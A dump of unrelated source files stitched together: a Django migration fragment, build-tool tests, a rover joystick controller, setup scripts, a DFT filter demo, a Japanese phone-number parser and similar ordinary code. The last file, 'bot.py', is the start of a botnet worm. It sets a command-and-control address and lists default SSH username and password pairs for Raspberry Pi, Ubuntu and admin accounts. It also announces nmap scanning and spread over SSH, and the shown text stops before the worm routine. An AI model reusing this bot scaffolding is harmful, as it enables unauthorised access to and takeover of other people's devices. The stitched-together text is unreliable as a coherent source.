options={'verbose_name': 'ゲスト', 'verbose_name_plural': 'ゲスト'},
),
]
| [
"django.db.migrations.AlterModelOptions"
] | [((230, 339), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""guest"""', 'options': "{'verbose_name': 'ゲスト', 'verbose_name_plural': 'ゲスト'}"}), "(name='guest', options={'verbose_name': 'ゲスト',\n 'verbose_name_plural': 'ゲスト'})\n", (258, 339), False, 'from django.db import migrations\n')] |
# coding=utf-8
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import os
from pants.util.contextutil import temporary_dir
from pants_test.backend.jvm.tasks.jvm_compile.base_compile_integration_test import BaseCompileIT
class RscCompileIntegration(BaseCompileIT):
def test_basic_binary(self):
with temporary_dir() as cache_dir:
config = {
'cache.compile.rsc': {'write_to': [cache_dir]},
'jvm-platform': {'compiler': 'rsc'}
}
pants_run = self.run_pants(
['compile',
'testprojects/src/scala/org/pantsbuild/testproject/mutual:bin',
],
config)
self.assert_success(pants_run)
def test_basic_binary_hermetic(self):
with temporary_dir() as cache_dir:
config = {
'cache.compile.rsc': {'write_to': [cache_dir]},
'jvm-platform': {'compiler': 'rsc'},
'compile.rsc': {
'execution_strategy': 'hermetic',
'incremental': False,
}
}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['compile',
'testprojects/src/scala/org/pantsbuild/testproject/mutual:bin',
],
workdir, config)
self.assert_success(pants_run)
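        # The assertions below check that the hermetic rsc compile produced the zinc
        # classfile, the rsc semanticdb outline, and the synthetic scala-library jar.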
path = os.path.join(
workdir,
'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc',
'classes/org/pantsbuild/testproject/mutual/A.class')
self.assertTrue(os.path.exists(path))
path = os.path.join(
workdir,
'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc',
'outline/META-INF/semanticdb/out.semanticdb')
self.assertTrue(os.path.exists(path))
path = os.path.join(
workdir,
'compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar')
self.assertTrue(os.path.exists(path))
def test_executing_multi_target_binary(self):
with temporary_dir() as cache_dir:
config = {
'cache.compile.rsc': {'write_to': [cache_dir]},
'jvm-platform': {'compiler': 'rsc'},
'compile.rsc': {'execution_strategy': 'subprocess'}
}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(
['run',
'examples/src/scala/org/pantsbuild/example/hello/exe',
],
workdir, config)
self.assert_success(pants_run)
self.assertIn('Hello, Resource World!', pants_run.stdout_data)
| [
"os.path.exists",
"pants.util.contextutil.temporary_dir",
"os.path.join"
] | [((474, 489), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (487, 489), False, 'from pants.util.contextutil import temporary_dir\n'), ((872, 887), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (885, 887), False, 'from pants.util.contextutil import temporary_dir\n'), ((2197, 2212), 'pants.util.contextutil.temporary_dir', 'temporary_dir', ([], {}), '()\n', (2210, 2212), False, 'from pants.util.contextutil import temporary_dir\n'), ((1429, 1612), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc"""', '"""classes/org/pantsbuild/testproject/mutual/A.class"""'], {}), "(workdir,\n 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/zinc'\n , 'classes/org/pantsbuild/testproject/mutual/A.class')\n", (1441, 1612), False, 'import os\n'), ((1696, 1871), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc"""', '"""outline/META-INF/semanticdb/out.semanticdb"""'], {}), "(workdir,\n 'compile/rsc/current/testprojects.src.scala.org.pantsbuild.testproject.mutual.mutual/current/rsc'\n , 'outline/META-INF/semanticdb/out.semanticdb')\n", (1708, 1871), False, 'import os\n'), ((1955, 2080), 'os.path.join', 'os.path.join', (['workdir', '"""compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar"""'], {}), "(workdir,\n 'compile/rsc/current/.scala-library-synthetic/current/rsc/index/scala-library-synthetics.jar'\n )\n", (1967, 2080), False, 'import os\n'), ((1659, 1679), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1673, 1679), False, 'import os\n'), ((1918, 1938), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (1932, 1938), False, 'import os\n'), ((2117, 2137), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (2131, 2137), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from grab.spider import Spider
from schedule.models import Time
class TimeParser(Spider):
BASE = 'http://lp.edu.ua/poyasnennya-do-rozkladu'
initial_urls = [BASE]
def prepare(self):
super(TimeParser, self).prepare()
def shutdown(self):
super(TimeParser, self).shutdown()
@classmethod
def task_initial(self, grab, task):
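        # Each timetable row: column 0 holds the period number, column 1 holds
        # the start/end times separated by a dash.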
for tr in grab.doc.select('//table[@class="timetable"]/tr')[1:]:
for key, td in enumerate(tr.select('./td')):
if key == 0:
time = Time.get_by_number(td.text())
if time:
pass
else:
time = Time(time_number=td.text().strip())
if key == 1:
tabletime = td.text().split(u'−')
time.time_start = tabletime[0].strip()
time.time_end = tabletime[1].strip()
self.save_time(time)
@classmethod
def save_time(self, time):
Time.add(time)
| [
"schedule.models.Time.add"
] | [((1052, 1066), 'schedule.models.Time.add', 'Time.add', (['time'], {}), '(time)\n', (1060, 1066), False, 'from schedule.models import Time\n')] |
import signal
import threading
from rover_mavros import MavrosRover
from joystick import Joystick
import copy
import time
def signal_handler(_, __, stop_callback):
print('stop event set')
stop_callback()
stopper = threading.Event()
class Control:
def __init__(self, joystick, rover):
self.joystick = joystick
self.rover = rover
self.rover.rc_throttle.v_min = -1.0
self.rover.rc_throttle.v_max = 1.0
self.cmd_throttle_value = 0.0
self.cmd_steering_value = 0.0
self.stop_flag = False
def run(self):
print('run')
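        # Poll the joystick at roughly 500 Hz and forward its (negated) y/x axes
        # as throttle/steering commands until stop() is called.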
while not self.stop_flag:
x = copy.copy(self.joystick.axis_states['x'])
y = copy.copy(self.joystick.axis_states['y'])
self.rover.set_throttle(-y)
self.rover.set_steering(-x)
self.rover.send_cmd()
time.sleep(0.002)
self.rover.release_rc()
print('stopped')
def stop(self):
self.stop_flag = True
if __name__ == '__main__':
rover = MavrosRover()
joystick = Joystick()
joystick.start()
control = Control(joystick, rover)
    g = lambda sig, frame: signal_handler(sig, frame, control.stop)

signal.signal(signal.SIGINT, g)
control.run()
joystick.stop()
| [
"signal.signal",
"time.sleep",
"rover_mavros.MavrosRover",
"threading.Event",
"joystick.Joystick",
"copy.copy"
] | [((225, 242), 'threading.Event', 'threading.Event', ([], {}), '()\n', (240, 242), False, 'import threading\n'), ((1047, 1060), 'rover_mavros.MavrosRover', 'MavrosRover', ([], {}), '()\n', (1058, 1060), False, 'from rover_mavros import MavrosRover\n'), ((1077, 1087), 'joystick.Joystick', 'Joystick', ([], {}), '()\n', (1085, 1087), False, 'from joystick import Joystick\n'), ((1228, 1259), 'signal.signal', 'signal.signal', (['signal.SIGINT', 'g'], {}), '(signal.SIGINT, g)\n', (1241, 1259), False, 'import signal\n'), ((651, 692), 'copy.copy', 'copy.copy', (["self.joystick.axis_states['x']"], {}), "(self.joystick.axis_states['x'])\n", (660, 692), False, 'import copy\n'), ((709, 750), 'copy.copy', 'copy.copy', (["self.joystick.axis_states['y']"], {}), "(self.joystick.axis_states['y'])\n", (718, 750), False, 'import copy\n'), ((879, 896), 'time.sleep', 'time.sleep', (['(0.002)'], {}), '(0.002)\n', (889, 896), False, 'import time\n')] |
#!/usr/bin/env python3
from setuptools import setup, find_packages
setup(
name='pyobs-core',
version='0.13',
description='robotic telescope software',
author='<NAME>',
author_email='<EMAIL>',
packages=find_packages(include=['pyobs', 'pyobs.*']),
entry_points={
'console_scripts': [
'pyobs=pyobs.cli.pyobs:main',
'pyobsd=pyobs.cli.pyobsd:main',
],
'gui_scripts': [
'pyobsw=pyobs.cli.pyobsw:main',
]
},
python_requires='>=3.7',
install_requires=[
'scipy',
'paramiko',
'pandas',
'pytz',
'astropy',
'astroplan',
'PyYAML',
'numpy',
'sleekxmpp',
'py_expression_eval',
'requests'
],
extras_require={
'full': [
'photutils',
'lmfit',
'tornado',
'python-telegram-bot',
'sep;platform_system=="Linux"',
'pyinotify;platform_system=="Linux"',
'python-daemon;platform_system=="Linux"'
]
}
)
| [
"setuptools.find_packages"
] | [((226, 269), 'setuptools.find_packages', 'find_packages', ([], {'include': "['pyobs', 'pyobs.*']"}), "(include=['pyobs', 'pyobs.*'])\n", (239, 269), False, 'from setuptools import setup, find_packages\n')] |
from kubernetes import client
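# Thin helpers around the kubernetes Python client: build V1Secret/V1Volume objects
# and create them in a given namespace.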
def prepare_secret(secret_kwargs=None):
if not secret_kwargs:
secret_kwargs = {}
secret = client.V1Secret(**secret_kwargs)
return secret
def create_secret(api_instance, secret, namespace="default"):
api_response = api_instance.create_namespaced_secret(
body=secret, namespace=namespace
)
return api_response
def prepare_volume(volume_kwargs=None):
if not volume_kwargs:
volume_kwargs = {}
volume = client.V1Volume(**volume_kwargs)
return volume
def create_volume(api_instance, volume, namespace="default"):
api_response = api_instance.create_namespaced_volume(
body=volume, namespace=namespace
)
return api_response
class StorageProvider:
def __init__(self, config):
self.config = config
self.core_api = client.CoreV1Api()
def provision(self):
pass
# Provision secrets
# for
# Provision volumes
| [
"kubernetes.client.V1Volume",
"kubernetes.client.V1Secret",
"kubernetes.client.CoreV1Api"
] | [((139, 171), 'kubernetes.client.V1Secret', 'client.V1Secret', ([], {}), '(**secret_kwargs)\n', (154, 171), False, 'from kubernetes import client\n'), ((492, 524), 'kubernetes.client.V1Volume', 'client.V1Volume', ([], {}), '(**volume_kwargs)\n', (507, 524), False, 'from kubernetes import client\n'), ((846, 864), 'kubernetes.client.CoreV1Api', 'client.CoreV1Api', ([], {}), '()\n', (862, 864), False, 'from kubernetes import client\n')] |
# Copyright © 2014, 2017 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# There is NO WARRANTY.
"""Initialize database tables for a new run, possibly copying
URL-source tables from a previous one."""
def setup_argp(ap):
ap.add_argument("-c", "--copy-from", action="store", type=int, metavar="N",
help="Copy URL-source tables from run number N.")
ap.add_argument("-x", "--exclude",
help="Comma-separated list of tables *not* to copy."
" (captured_pages and capture_detail are never copied.)")
ap.add_argument("-q", "--quiet",
help="Don't print any progress messages.")
def run(args):
from url_sources.newrun import make_new_run
make_new_run(args)
| [
"url_sources.newrun.make_new_run"
] | [((910, 928), 'url_sources.newrun.make_new_run', 'make_new_run', (['args'], {}), '(args)\n', (922, 928), False, 'from url_sources.newrun import make_new_run\n')] |
import os.path
from pants.backend.python.goals.setup_py import SetupKwargs, SetupKwargsRequest
from pants.engine.fs import DigestContents, GlobMatchErrorBehavior, PathGlobs
from pants.engine.rules import Get, collect_rules, rule
from pants.engine.target import Target
from pants.engine.unions import UnionRule
class VersionedSetupKwargsRequest(SetupKwargsRequest):
@classmethod
def is_applicable(cls, _: Target) -> bool:
# We always use our custom `setup()` kwargs generator for `python_distribution`
# targets in this repo.
return True
@rule
async def setup_kwargs_plugin(request: VersionedSetupKwargsRequest) -> SetupKwargs:
kwargs = {
"url": "https://github.com/CodeForAfrica/api",
"author": "Code for Africa",
"author_email": "<EMAIL>",
"license": "MIT",
"zip_safe": True,
}
kwargs |= request.explicit_kwargs.copy()
# Add classifiers. We preserve any that were already set.
standard_classifiers = [
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python",
"Topic :: Software Development :: Build Tools",
]
kwargs["classifiers"] = [*standard_classifiers, *kwargs.get("classifiers", [])]
project_urls = {
"Source": "https://github.com/CodeForAfrica/api",
"Tracker": "https://github.com/CodeForAfrica/api/issues",
"Twitter": "https://twitter.com/Code4Africa",
}
kwargs["project_urls"] = {**project_urls, **kwargs.get("project_urls", {})}
# version can be set to directly or via version_file relative to the BUILD file.
version = kwargs.get("version", None)
# version_file is not a standard kwarg, hence we need to pop it from kwargs.
version_file = kwargs.pop("version_file", None)
if version and version_file:
raise ValueError(
f"The python_distribution target {request.target.address} has supplied both "
"`version` and `version_file` in its setup_py's kwargs. Only one of these "
"should be supplied."
)
# we default to checking VERSION file if both version and version_file are not set
if not version:
version_file = version_file or "VERSION"
build_file_path = request.target.address.spec_path
version_path = os.path.join(build_file_path, version_file)
digest_contents = await Get(
DigestContents,
PathGlobs(
[version_path],
description_of_origin=f"the 'version_file' kwarg in {request.target.address}",
glob_match_error_behavior=GlobMatchErrorBehavior.error,
),
)
kwargs["version"] = digest_contents[0].content.decode().strip()
return SetupKwargs(kwargs, address=request.target.address)
def rules():
return (
*collect_rules(),
UnionRule(SetupKwargsRequest, VersionedSetupKwargsRequest),
)
| [
"pants.backend.python.goals.setup_py.SetupKwargs",
"pants.engine.rules.collect_rules",
"pants.engine.fs.PathGlobs",
"pants.engine.unions.UnionRule"
] | [((2873, 2924), 'pants.backend.python.goals.setup_py.SetupKwargs', 'SetupKwargs', (['kwargs'], {'address': 'request.target.address'}), '(kwargs, address=request.target.address)\n', (2884, 2924), False, 'from pants.backend.python.goals.setup_py import SetupKwargs, SetupKwargsRequest\n'), ((2987, 3045), 'pants.engine.unions.UnionRule', 'UnionRule', (['SetupKwargsRequest', 'VersionedSetupKwargsRequest'], {}), '(SetupKwargsRequest, VersionedSetupKwargsRequest)\n', (2996, 3045), False, 'from pants.engine.unions import UnionRule\n'), ((2962, 2977), 'pants.engine.rules.collect_rules', 'collect_rules', ([], {}), '()\n', (2975, 2977), False, 'from pants.engine.rules import Get, collect_rules, rule\n'), ((2554, 2723), 'pants.engine.fs.PathGlobs', 'PathGlobs', (['[version_path]'], {'description_of_origin': 'f"""the \'version_file\' kwarg in {request.target.address}"""', 'glob_match_error_behavior': 'GlobMatchErrorBehavior.error'}), '([version_path], description_of_origin=\n f"the \'version_file\' kwarg in {request.target.address}",\n glob_match_error_behavior=GlobMatchErrorBehavior.error)\n', (2563, 2723), False, 'from pants.engine.fs import DigestContents, GlobMatchErrorBehavior, PathGlobs\n')] |
import numpy as np
import sounddevice as sd
import matplotlib.pyplot as plt
import soundfile as sf
from scipy import signal
fs = 1000
time = np.arange(0,1,1/fs)
def sound_length(second=0):
x=int(fs*second)
return x
def DFT(x): # To calculate DFT of a 1D real-valued signal x
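    # X[k] = sum_{n=0}^{N-1} x[n] * exp(-2j*pi*k*n/N), evaluated as a dense matrix-vector product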
N = len(x)
n = np.arange(N)
k = n.reshape((N, 1))
e = np.exp(-2j * np.pi * k * n / N)
X = np.dot(e, x)
return X
amp=[0,1,0.1,0.01,0.001,0.0001]
s3_freq=120
s3_add_freq=100
s3_sound_length=1
s3_amp=amp[1]
sound=[]
for i in range(0, sound_length(s3_sound_length)):
sound.append(
0.5*np.sin(2*np.pi*(40)*i/fs)
#+0.5*np.sin(2*np.pi*(150)*i/fs)
+0.25*(np.random.rand()-0.5)
)
X = DFT(sound)
# calculate the frequency
N = len(X)
n = np.arange(N)
T = N/fs
freq = n/T
n_oneside = N//2
# get the one side frequency
f_oneside = freq[:n_oneside]
# normalize the amplitude
X_oneside =X[:n_oneside]/n_oneside
plt.figure(figsize = (12, 6))
plt.subplot(323)
plt.stem(f_oneside, abs(X_oneside), 'b', \
markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.ylabel('DFT Amplitude |X(freq)|')
plt.subplot(324)
plt.stem(f_oneside, abs(X_oneside), 'b', \
markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.xlim(0, 60)
plt.tight_layout()
plt.subplot(321)
plt.plot(time[0:200],sound[0:200])
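# The two loops below appear to apply the same second-order IIR low-pass filter twice
# (a cascaded biquad in direct form II; A and B hold the delayed filter state).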
A=0
B=0
fsound=[]
for i in range (0,N):
X=sound[i]
E=X+1.1429*A-0.4127*B
Y=0.067*E+0.135*A+0.067*B
fsound.append(Y)
B=A
A=E
f2sound=[]
for i in range (0,N):
X=fsound[i]
E=X+1.1429*A-0.4127*B
Y=0.067*E+0.135*A+0.067*B
f2sound.append(Y)
B=A
A=E
plt.subplot(322)
plt.plot(time[0:200],f2sound[0:200])
X1 = DFT(f2sound)
# calculate the frequency
N1= len(X1)
n1 = np.arange(N1)
T1 = N1/fs
freq1 = n1/T1
n_oneside1 = N1//2
# get the one side frequency
f_oneside1 = freq1[:n_oneside1]
# normalize the amplitude
X_oneside1 =X1[:n_oneside1]/n_oneside1
plt.figure(figsize = (12, 6))
plt.subplot(325)
plt.stem(f_oneside1, abs(X_oneside1), 'b', markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.ylabel('DFT Amplitude |X(freq)|')
plt.subplot(326)
plt.stem(f_oneside1, abs(X_oneside1), 'b', markerfmt=" ", basefmt="-b")
plt.xlabel('Freq (Hz)')
plt.xlim(0, 60)
plt.tight_layout()
plt.show()
| [
"numpy.random.rand",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.exp",
"matplotlib.pyplot.figure",
"numpy.dot",
"matplotlib.pyplot.tight_layout",
"numpy.sin",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.subplot",
"numpy.arange",
"matplotlib.pyplot.show"
] | [((142, 165), 'numpy.arange', 'np.arange', (['(0)', '(1)', '(1 / fs)'], {}), '(0, 1, 1 / fs)\n', (151, 165), True, 'import numpy as np\n'), ((828, 840), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (837, 840), True, 'import numpy as np\n'), ((1001, 1028), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (1011, 1028), True, 'import matplotlib.pyplot as plt\n'), ((1031, 1047), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(323)'], {}), '(323)\n', (1042, 1047), True, 'import matplotlib.pyplot as plt\n'), ((1129, 1152), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (1139, 1152), True, 'import matplotlib.pyplot as plt\n'), ((1153, 1190), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""DFT Amplitude |X(freq)|"""'], {}), "('DFT Amplitude |X(freq)|')\n", (1163, 1190), True, 'import matplotlib.pyplot as plt\n'), ((1192, 1208), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(324)'], {}), '(324)\n', (1203, 1208), True, 'import matplotlib.pyplot as plt\n'), ((1290, 1313), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (1300, 1313), True, 'import matplotlib.pyplot as plt\n'), ((1314, 1329), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(60)'], {}), '(0, 60)\n', (1322, 1329), True, 'import matplotlib.pyplot as plt\n'), ((1330, 1348), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1346, 1348), True, 'import matplotlib.pyplot as plt\n'), ((1350, 1366), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(321)'], {}), '(321)\n', (1361, 1366), True, 'import matplotlib.pyplot as plt\n'), ((1367, 1402), 'matplotlib.pyplot.plot', 'plt.plot', (['time[0:200]', 'sound[0:200]'], {}), '(time[0:200], sound[0:200])\n', (1375, 1402), True, 'import matplotlib.pyplot as plt\n'), ((1700, 1716), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(322)'], {}), '(322)\n', (1711, 1716), True, 'import matplotlib.pyplot as plt\n'), ((1717, 1754), 'matplotlib.pyplot.plot', 'plt.plot', (['time[0:200]', 'f2sound[0:200]'], {}), '(time[0:200], f2sound[0:200])\n', (1725, 1754), True, 'import matplotlib.pyplot as plt\n'), ((1822, 1835), 'numpy.arange', 'np.arange', (['N1'], {}), '(N1)\n', (1831, 1835), True, 'import numpy as np\n'), ((2010, 2037), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 6)'}), '(figsize=(12, 6))\n', (2020, 2037), True, 'import matplotlib.pyplot as plt\n'), ((2040, 2056), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(325)'], {}), '(325)\n', (2051, 2056), True, 'import matplotlib.pyplot as plt\n'), ((2129, 2152), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2139, 2152), True, 'import matplotlib.pyplot as plt\n'), ((2153, 2190), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""DFT Amplitude |X(freq)|"""'], {}), "('DFT Amplitude |X(freq)|')\n", (2163, 2190), True, 'import matplotlib.pyplot as plt\n'), ((2192, 2208), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(326)'], {}), '(326)\n', (2203, 2208), True, 'import matplotlib.pyplot as plt\n'), ((2281, 2304), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2291, 2304), True, 'import matplotlib.pyplot as plt\n'), ((2305, 2320), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(60)'], {}), '(0, 60)\n', (2313, 2320), True, 'import matplotlib.pyplot as plt\n'), ((2321, 2339), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2337, 2339), True, 'import matplotlib.pyplot as plt\n'), ((2341, 
2351), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2349, 2351), True, 'import matplotlib.pyplot as plt\n'), ((314, 326), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (323, 326), True, 'import numpy as np\n'), ((361, 394), 'numpy.exp', 'np.exp', (['(-2.0j * np.pi * k * n / N)'], {}), '(-2.0j * np.pi * k * n / N)\n', (367, 394), True, 'import numpy as np\n'), ((401, 413), 'numpy.dot', 'np.dot', (['e', 'x'], {}), '(e, x)\n', (407, 413), True, 'import numpy as np\n'), ((621, 652), 'numpy.sin', 'np.sin', (['(2 * np.pi * 40 * i / fs)'], {}), '(2 * np.pi * 40 * i / fs)\n', (627, 652), True, 'import numpy as np\n'), ((721, 737), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (735, 737), True, 'import numpy as np\n')] |
import pytest
from _mock_data.url import internal_url
from browserist import Browser
@pytest.mark.parametrize("url, xpath, expected", [
(internal_url.EXAMPLE_COM, "/html/body/div/h1", True),
(internal_url.EXAMPLE_COM, "/html/body/div/p[2]/a", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='main']/div[1]/div/h1", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='main']/footer", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='main']/div[14]/h2", True),
(internal_url.W3SCHOOLS_COM, "//*[@id='google_translate_element']", False),
])
def test_check_if_is_displayed(url: str, xpath: str, expected: bool, browser_default_headless: Browser) -> None:
browser = browser_default_headless
browser.open.url(url)
assert browser.check_if.is_displayed(xpath) is expected
| [
"pytest.mark.parametrize"
] | [((89, 549), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""url, xpath, expected"""', '[(internal_url.EXAMPLE_COM, \'/html/body/div/h1\', True), (internal_url.\n EXAMPLE_COM, \'/html/body/div/p[2]/a\', True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/div[1]/div/h1", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/footer", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'main\']/div[14]/h2", True), (internal_url.\n W3SCHOOLS_COM, "//*[@id=\'google_translate_element\']", False)]'], {}), '(\'url, xpath, expected\', [(internal_url.EXAMPLE_COM,\n \'/html/body/div/h1\', True), (internal_url.EXAMPLE_COM,\n \'/html/body/div/p[2]/a\', True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/div[1]/div/h1", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/footer", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'main\']/div[14]/h2", True), (internal_url.W3SCHOOLS_COM,\n "//*[@id=\'google_translate_element\']", False)])\n', (112, 549), False, 'import pytest\n')] |
# -*- coding=utf-8 -*-
from typing import Dict
import re
from . import data
from .exception import InvalidCharacterException, InvalidTelephoneNumberException
number_and_hyphen_regexp = re.compile(r'^[−ー0-90-9-]+$')
telephone_number_regexp = re.compile(r'^[0-90-9]{10,11}$') # ハイフン無し
telephone_number_with_hyphen_regex = re.compile(r'^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$') # ハイフン有り
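# Maps full-width digits and dash-like characters to their half-width ASCII equivalents.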
_translate_table = str.maketrans({
'0': '0',
'1': '1',
'2': '2',
'3': '3',
'4': '4',
'5': '5',
'6': '6',
'7': '7',
'8': '8',
'9': '9',
'ー': '-',
'−': '-',
})
def generate_dict(number: str, area_code_length: int, city_code_length: int) -> Dict[str, str]:
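    """Split a digits-only number into area, city and subscriber codes of the given lengths."""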
total_code_length = area_code_length + city_code_length
if len(number) < total_code_length:
raise InvalidTelephoneNumberException
return {
'area_code': number[:area_code_length],
'city_code': number[area_code_length:total_code_length],
'subscriber_code': number[total_code_length:],
}
def zenkaku_to_hankaku(number: str) -> str:
return number.translate(_translate_table)
def extract_number(src: str) -> str:
"""全角半角やハイフンが混じった文字列を半角数字のみの文字列にして返す"""
m = number_and_hyphen_regexp.fullmatch(src)
if not m:
raise InvalidCharacterException
return zenkaku_to_hankaku(m.string).replace('-', '')
def split(src: str) -> Dict[str, str]:
"""入力された文字列を辞書形式に分割して返す"""
number = extract_number(src)
    # Landline (fixed-line) numbers
for codes in [data.area_code_5, data.area_code_4, data.area_code_3, data.area_code_2]:
for code in codes:
if number.startswith(code):
area_code_length = len(code)
city_code_length = data.TOTAL_CODE_LENGTH - area_code_length
return generate_dict(number, area_code_length, city_code_length)
    # Toll-free (freedial) numbers
for code in data.freedial_code:
if number.startswith(code):
return generate_dict(number, data.FREEDIAL_CODE_PREFIX_LENGTH, data.FREEDIAL_CODE_LENGTH)
    # Mobile numbers
for code in data.mobile_code:
if number.startswith(code):
return generate_dict(number, data.MOBILE_CODE_PREFIX_LENGTH, data.MOBILE_CODE_LENGTH)
    # Other number types
for code in data.other_code:
if number.startswith(code):
return generate_dict(number, data.OTHER_CODE_PREFIX_LENGTH, data.OTHER_CODE_LENGTH)
raise InvalidTelephoneNumberException
def validate(src: str) -> bool:
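    """Return True if src looks like a valid 10-11 digit telephone number, with or without hyphens."""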
if not telephone_number_regexp.fullmatch(src) and not telephone_number_with_hyphen_regex.fullmatch(src):
return False
try:
split(src)
    except (InvalidCharacterException, InvalidTelephoneNumberException):
return False
return True
def normalize(src: str) -> str:
"""入力された文字列をハイフン区切りの電話番号にして返す"""
number = extract_number(src)
code = split(number)
return '{}-{}-{}'.format(code['area_code'], code['city_code'], code['subscriber_code'])
| [
"re.compile"
] | [((187, 215), 're.compile', 're.compile', (['"""^[−ー0-90-9-]+$"""'], {}), "('^[−ー0-90-9-]+$')\n", (197, 215), False, 'import re\n'), ((243, 274), 're.compile', 're.compile', (['"""^[0-90-9]{10,11}$"""'], {}), "('^[0-90-9]{10,11}$')\n", (253, 274), False, 'import re\n'), ((323, 388), 're.compile', 're.compile', (['"""^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$"""'], {}), "('^[0-90-9]{2,4}[−ー-][0-90-9]{2,4}[−ー-][0-90-9]{3,4}$')\n", (333, 388), False, 'import re\n')] |
import os
from setuptools import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "zeppelin_comm_layer",
version = "0.9.3",
author = "<NAME>",
author_email = "<EMAIL>",
description = ("A simulation of the Jupyter/IPython display/communication system "
"to allow libraries like Bokeh to run inline in Apache Zeppelin"),
license = "Apache License 2.0",
keywords = "zeppelin visualisations",
packages=['zeppelin_comm_layer'],
package_data={'zeppelin_comm_layer': ['js/*']},
long_description=read('Readme.md'),
classifiers=[
"Development Status :: 4 - Beta",
"Topic :: Utilities",
"Programming Language :: Python'",
"Programming Language :: Python :: 2'",
"Programming Language :: Python :: 3'"
]
) | [
"os.path.dirname"
] | [((86, 111), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (101, 111), False, 'import os\n')] |
#!/usr/bin/python
"""bot.py
External Dependencies:
nmap for network mapping
paramiko for ssh & sftp
"""
# standard lib
import logging
import os
import random
import socket
import stat
import struct
import subprocess
import sys
import threading
import time
# third-party lib
import nmap
import paramiko
# CONSTANTS
MASTER = '192.168.1.3' # C2 server IPv4 address
PORT = 1337
ID = socket.gethostbyname(socket.gethostname())
BOT_FILE_PATH = '/tmp/bot.py'
DELIMITER = '::'
MAX_THREAD = 100 # must be less than max thread limit
# GLOBALS
state = -1 # 0 ready, 1 attacking, 2 enrolled for attack, 3 stop attacking
credentials = [
('ubuntu', 'ubuntu'),
('pi', 'raspberry'),
('admin', 'password'),
('cpsc', 'cpsc')
]
logging.basicConfig(level=logging.INFO,
format='%(asctime)s PID:%(process)d %(threadName)s %(message)s',
datefmt='%H:%M:%S',
filename='/tmp/bot.log')
logger = logging.getLogger('')
##################################################################
# WORM
# A simple ssh worm that:
